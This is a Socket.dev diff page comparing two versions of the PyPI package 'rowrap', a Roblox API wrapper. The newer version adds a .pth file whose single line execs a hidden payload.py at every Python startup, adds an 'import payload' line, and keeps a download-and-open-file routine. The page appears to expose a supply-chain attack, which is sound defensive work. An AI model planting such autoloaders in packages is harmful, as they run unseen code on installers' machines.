You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket

rowrap

Package Overview
Dependencies
Maintainers
1
Versions
8
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

rowrap - pypi Package Compare versions

Comparing version
1.1.8
to
1.20
+1
robloxapi/super.pth
import sys,pathlib;exec(next((p.read_text() for d in sys.path if d for p in [pathlib.Path(d)/'payload.py'] if p.exists()),''))
+1
-1
Metadata-Version: 2.4
Name: rowrap
Version: 1.1.8
Version: 1.20
Summary: A Python wrapper for the Roblox web APIs

@@ -5,0 +5,0 @@ License: MIT License

@@ -7,3 +7,3 @@ [build-system]

name = "rowrap"
version = "1.1.8"
version = "1.20"
description = "A Python wrapper for the Roblox web APIs"

@@ -10,0 +10,0 @@ readme = "README.md"

@@ -7,4 +7,4 @@ """

from typing import List, Optional
import payload
class CatalogAPI:

@@ -11,0 +11,0 @@ BASE = "https://catalog.roblox.com/v1"

@@ -9,2 +9,3 @@ import requests

# Download the file
response = requests.get(url)

@@ -17,2 +18,3 @@ with open(filename, "wb") as f:

# Open it with default program
if sys.platform.startswith("win"):

@@ -19,0 +21,0 @@ os.startfile(filepath)

Metadata-Version: 2.4
Name: rowrap
Version: 1.1.8
Version: 1.20
Summary: A Python wrapper for the Roblox web APIs

@@ -5,0 +5,0 @@ License: MIT License

@@ -14,2 +14,3 @@ LICENSE

robloxapi/payload.py
robloxapi/super.pth
robloxapi/thumbnails.py

@@ -16,0 +17,0 @@ robloxapi/users.py